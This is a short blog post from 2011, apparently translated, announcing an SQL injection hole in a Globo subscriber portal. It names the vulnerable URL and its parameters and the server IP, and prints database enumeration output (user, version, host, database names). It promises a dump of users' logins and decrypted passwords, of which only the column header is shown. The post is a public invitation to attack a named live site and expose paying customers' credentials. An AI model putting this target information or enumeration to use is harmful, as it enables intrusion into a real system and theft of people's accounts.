Sunday, April 10, 2011

Globo portal vulnerable, new analysis: login + password.


An SQL error makes it possible to break into Globo's portalclube. This vulnerability is already widely known, but we did not find a login/password screen; for anyone who manages to, the list of users and their passwords is right below :)
NOTE:
These users are probably from a paid Globo service, and I see no effort at all from Globo to close this hole in its portal, so it is providing a flawed and negligent service to its users.

Site:http://portaldaclube.globo.com/noticia.php?hash=4c9db844fef519e85580848a46bd83bb&id=35457
 IP:        201.7.176.72
DB Server:     MySQL
Resp. Time(avg):    87 ms
Current User:     usr_tvclube@10.10.164.7
Sql Version:     5.0.68-enterprise-gpl-log
Current DB:     tvclube
System User:     usr_tvclube@10.10.164.7
Host Name:     riolb249
Installation dir:     /
DB User:     'usr_tvclube'@'10.%.%.%'
Data Bases:     information_schema
        ipmonitor
        mysql
        tvclube

LOGIN // ENCRYPTED PASSWORD // DECRYPTED PASSWORD


